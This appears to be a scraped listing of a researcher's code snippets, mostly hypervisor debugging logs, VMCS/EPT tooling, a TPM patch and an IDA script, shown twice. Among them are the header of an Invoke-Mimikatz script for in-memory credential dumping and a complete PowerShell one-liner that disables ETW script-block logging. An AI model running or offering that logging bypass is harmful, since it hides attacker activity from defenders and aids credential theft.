Satoshi Tanda tandasat

## hvci_vpid1.log
kd> !dump_vmcs
0x0000000000000001 Virtual-processor identifier (VPID)
***** FAILED ***** Posted-interrupt notification vector
0x0000000000000000 EPTP index
***** FAILED ***** HLAT prefix size
***** FAILED ***** Last PID-pointer
0x000000000000002b Guest ES selector
0x0000000000000010 Guest CS selector
0x0000000000000018 Guest SS selector
0x000000000000002b Guest DS selector

## parse_drtm_log.patch
diff --git a/PCPTool.v11/exe/SDKSample.cpp b/PCPTool.v11/exe/SDKSample.cpp
index edcc966..984690f 100644
--- a/PCPTool.v11/exe/SDKSample.cpp
+++ b/PCPTool.v11/exe/SDKSample.cpp
@@ -1813,7 +1813,7 @@ log can be used to calculate the PCRs in the TPM.
     {
         goto Cleanup;
     }
-    if(FAILED(hr = Tbsi_Get_TCG_Log(hContext, NULL, &cbLog)))
+    if(FAILED(hr = Tbsi_Get_TCG_Log_Ex(TBS_TCGLOG_DRTM_CURRENT, NULL, &cbLog)))

## !dump_ept.txt
kd> !dump_ept
Current EPT pointer 0x11b8bc09e
GPA                          PA          Flags
         0x0 -       0x1000 -> Identity     ------WR
      0x1000 -       0x2000 -> Identity     ---U--WR
      0x3000 -      0x9f000 -> Identity     ---U--WR
     0x9f000 -     0x100000 -> Identity     ------WR
    0x100000 -     0xa46000 -> Identity     ---U--WR
    0xa47000 -    0x4c00000 -> Identity     ---U--WR
   0x5000000 -    0xa201000 -> Identity     ---U--WR

## GetPhysicalMemoryRanges.c
/**
 * @brief Returns an array of physical memory address ranges on the system.
 *
 * @param This - The pointer to the platform API interface.
 * @param RangeCount - The pointer to receive the number of entries in the returned
 *      pointer on success.
 * @return The pointer to the array of ranges on success. This must be freed with
 *      Freed with FREE_CONTIGUOUS_PAGES. On failure, NULL.
 */
STATIC

## dump_vmcs.js
"use strict";

// This script implements the !dump_vmcs command that displays values of the all
// fields in the current VMCS. The processor must be in VMX-root operation with
// an active VMCS.
//
// As a reference, there are some other implementations of the same concept. The
// author is now aware of those two at least. Check them out as it may fit your
// need better.
// - https://github.com/ergot86/crap/blob/main/hyperv_stuff.js (Windbg JavaScript)

## list_first_instruction.py
from idautils import *
from idaapi import *
from idc import *

for funcea in Functions():
    functionName = get_func_name(funcea)
    for (startea, endea) in Chunks(funcea):
        print(f"{startea:08x} {GetDisasm(startea)} : {functionName}")

## CheckGuestVmcsFieldsForVmEntry.c
/**
 * @file CheckGuestVmcsFieldsForVmEntry.c
 * @author Satoshi Tanda (tanda.sat@gmail.com)
 * @brief Checks validity of the guest VMCS fields for VM-entry as per
 *      26.3 CHECKING AND LOADING GUEST STATE
 * @version 0.1
 * @date 2021-02-20
 *
 * @details This file implements part of checks performed by a processor during
 *      VM-entry as CheckGuestVmcsFieldsForVmEntry(). This can be called on VM-exit

## GuestAgent.c
/*!
    @file GuestAgent.c

    @brief GuestAgent code.

    @author Satoshi Tanda

    @copyright Copyright (c) 2020 - , Satoshi Tanda. All rights reserved.
 */
#include "GuestAgent.h"

## Invoke-BypassingMimikatz.ps1
#
function Invoke-Mimikatz
{
<#
.SYNOPSIS

This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers.

## KillETW.ps1
#
# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging for readability.
#
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
	kd> !dump_vmcs
	0x0000000000000001 Virtual-processor identifier (VPID)
	*** FAILED *** Posted-interrupt notification vector
	0x0000000000000000 EPTP index
	*** FAILED *** HLAT prefix size
	*** FAILED *** Last PID-pointer
	0x000000000000002b Guest ES selector
	0x0000000000000010 Guest CS selector
	0x0000000000000018 Guest SS selector
	0x000000000000002b Guest DS selector
	diff --git a/PCPTool.v11/exe/SDKSample.cpp b/PCPTool.v11/exe/SDKSample.cpp
	index edcc966..984690f 100644
	--- a/PCPTool.v11/exe/SDKSample.cpp
	+++ b/PCPTool.v11/exe/SDKSample.cpp
	@@ -1813,7 +1813,7 @@ log can be used to calculate the PCRs in the TPM.
	{
	goto Cleanup;
	}
	- if(FAILED(hr = Tbsi_Get_TCG_Log(hContext, NULL, &cbLog)))
	+ if(FAILED(hr = Tbsi_Get_TCG_Log_Ex(TBS_TCGLOG_DRTM_CURRENT, NULL, &cbLog)))
	kd> !dump_ept
	Current EPT pointer 0x11b8bc09e
	GPA PA Flags
	0x0 - 0x1000 -> Identity ------WR
	0x1000 - 0x2000 -> Identity ---U--WR
	0x3000 - 0x9f000 -> Identity ---U--WR
	0x9f000 - 0x100000 -> Identity ------WR
	0x100000 - 0xa46000 -> Identity ---U--WR
	0xa47000 - 0x4c00000 -> Identity ---U--WR
	0x5000000 - 0xa201000 -> Identity ---U--WR
	/**
	* @brief Returns an array of physical memory address ranges on the system.
	*
	* @param This - The pointer to the platform API interface.
	* @param RangeCount - The pointer to receive the number of entries in the returned
	* pointer on success.
	* @return The pointer to the array of ranges on success. This must be freed with
	* Freed with FREE_CONTIGUOUS_PAGES. On failure, NULL.
	*/
	STATIC
	"use strict";

	// This script implements the !dump_vmcs command that displays values of the all
	// fields in the current VMCS. The processor must be in VMX-root operation with
	// an active VMCS.
	//
	// As a reference, there are some other implementations of the same concept. The
	// author is now aware of those two at least. Check them out as it may fit your
	// need better.
	// - https://github.com/ergot86/crap/blob/main/hyperv_stuff.js (Windbg JavaScript)
	from idautils import *
	from idaapi import *
	from idc import *

	for funcea in Functions():
	functionName = get_func_name(funcea)
	for (startea, endea) in Chunks(funcea):
	print(f"{startea:08x} {GetDisasm(startea)} : {functionName}")
	/**
	* @file CheckGuestVmcsFieldsForVmEntry.c
	* @author Satoshi Tanda (tanda.sat@gmail.com)
	* @brief Checks validity of the guest VMCS fields for VM-entry as per
	* 26.3 CHECKING AND LOADING GUEST STATE
	* @version 0.1
	* @date 2021-02-20
	*
	* @details This file implements part of checks performed by a processor during
	* VM-entry as CheckGuestVmcsFieldsForVmEntry(). This can be called on VM-exit
	/*!
	@file GuestAgent.c

	@brief GuestAgent code.

	@author Satoshi Tanda

	@copyright Copyright (c) 2020 - , Satoshi Tanda. All rights reserved.
	*/
	#include "GuestAgent.h"
	#
	function Invoke-Mimikatz
	{
	<#
	.SYNOPSIS

	This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
	dump credentials without ever writing the mimikatz binary to disk.
	The script has a ComputerName parameter which allows it to be executed against multiple computers.
	#
	# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
	# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
	# to bypass Suspicious ScriptBlock Logging for readability.
	#
	[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)